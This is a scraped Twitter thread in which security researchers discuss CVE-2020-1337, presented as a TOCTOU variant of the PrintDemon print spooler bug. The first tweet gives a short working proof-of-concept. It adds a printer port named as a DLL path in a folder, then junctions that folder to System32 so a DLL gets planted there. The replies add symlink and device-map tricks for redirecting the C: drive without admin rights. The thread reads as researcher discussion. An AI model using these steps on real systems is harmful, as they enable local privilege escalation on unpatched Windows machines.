CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon) with a TOCTOU. PoC: mkdir C:\test Add-PrinterPort -Name c:\test\ualapi.dll New-Item -Type Junction -Path C:\test -Value C:\Windows\System32
-
-
I forgot we did :)
-
Haha, would have bet Jonas used the device map, his implementation of the technique is

- Show replies
New conversation -
-
-
Don't you have to be an admin to map \??\c: to some other location? CreateDosDeviceSymlink gives me access denied for a non-admin user.
-
The DefineDosDevice API first checks if there's an existing C: drive, as there is in \GLOBAL?? it tries to delete it which fails. But you can just use NtCreateSymbolicLinkObject with \??\C: . Just use the NativeSymlink tool.
- Show replies
New conversation -
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
